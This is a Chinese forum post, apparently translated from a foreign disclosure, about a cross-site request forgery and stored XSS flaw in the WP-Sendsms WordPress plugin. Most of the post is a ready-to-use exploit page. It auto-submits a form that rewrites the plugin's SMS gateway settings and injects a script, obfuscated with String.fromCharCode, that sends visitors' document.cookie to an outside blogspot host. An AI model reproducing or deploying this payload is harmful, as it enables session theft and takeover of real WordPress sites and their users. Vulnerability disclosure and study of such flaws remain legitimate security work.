发个WP-Sendsms的XXS漏洞

2013-06-12 11:14:23 3 2969
从国外网站译下来的,大家看看哈。

WP-Sendsms是一款wordpress 的发送短信的插件,插件有自己的配置页面,可以配置sms的网关。
这个XXS漏洞允许你通过跨站请求漏洞触发来修改网关配置。

XSS地址
http://127.0.0.1/wordpress-3.5.1/wordpress/wp-admin/admin.php?page=sms

攻击代码如下:
<html>
<head>
<script type="text/javascript" language="javascript">
function submitform()
{
    document.getElementById('myForm').submit();
}
</script>
</head>
<body>
<form name="myForm" action="http://127.0.0.1/wordpress-3.5.1/wordpress/wp-admin/admin.php?page=sms" method="post">
  
<textarea name="wpsms_api1" id="wpsms_api1" class="regular-text" cols="100" rows="5">http://blackpentesters.blogspot.com/smsapi.php?username=yourusername&password=yourpassword&mobile=[Mobile]&sms=[TextMessage]&senderid=[SenderID]</textarea>
  
<input type="text" name="sender_id" id="sender_id" value="eXpl0i13r">
<input type="checkbox" name="remove_bad_words" id="remove_bad_words" checked="checked" value="1">
  
# Below Field Contains XSS Payload for sending Cookies to attacker website :
# In my case this will redirect you to http://blackpentesters.blogspot.com+cookies
  
<input type="text" name="maximum_characters" class="maximum_characters" id="maximum_characters" value=""><script>location=String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(116)+String.fromCharCode(112)+String.fromCharCode(58)+String.fromCharCode(47)+String.fromCharCode(47)+String.fromCharCode(98)+String.fromCharCode(108)+String.fromCharCode(97)+String.fromCharCode(99)+String.fromCharCode(107)+String.fromCharCode(112)+String.fromCharCode(101)+String.fromCharCode(110)+String.fromCharCode(116)+String.fromCharCode(101)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(115)+String.fromCharCode(46)+String.fromCharCode(98)+String.fromCharCode(108)+String.fromCharCode(111)+String.fromCharCode(103)+String.fromCharCode(115)+String.fromCharCode(112)+String.fromCharCode(111)+String.fromCharCode(116)+String.fromCharCode(46)+String.fromCharCode(99)+String.fromCharCode(111)+String.fromCharCode(109)+String.fromCharCode(47)+String.fromCharCode(63)+document.cookie</script>">
  
<input type="checkbox" name="captcha" id="captcha" checked="checked" value="1">  
<input type="text" name="captcha_width" class="captcha_option_input" value="" id="acpro_inp4">
<input type="text" name="captcha_height" class="captcha_option_input" value="" id="acpro_inp5">
<input type="text" name="captcha_characters" class="captcha_option_input" value="4" id="acpro_inp6">
<input type="checkbox" name="confirm_page" id="confirm_page" checked="checked" value="1">
<input type="checkbox" name="allow_without_login" id="allow_without_login" checked="checked" value="1">
<input type="checkbox" name="custom_response" id="custom_response" value="1">
<textarea name="custom_response_text" cols="100" rows="5"></textarea>
<input type="hidden" name="settings_submit" value="true">
<input type="submit" value="Update Settings" class="button-primary">
</form>
  
<script type="text/javascript" language="javascript">
document.myForm.submit()
</script>
</body>
</html>

关于作者

wxcad15篇文章207篇回复

评论3次

要评论?请先  登录  或  注册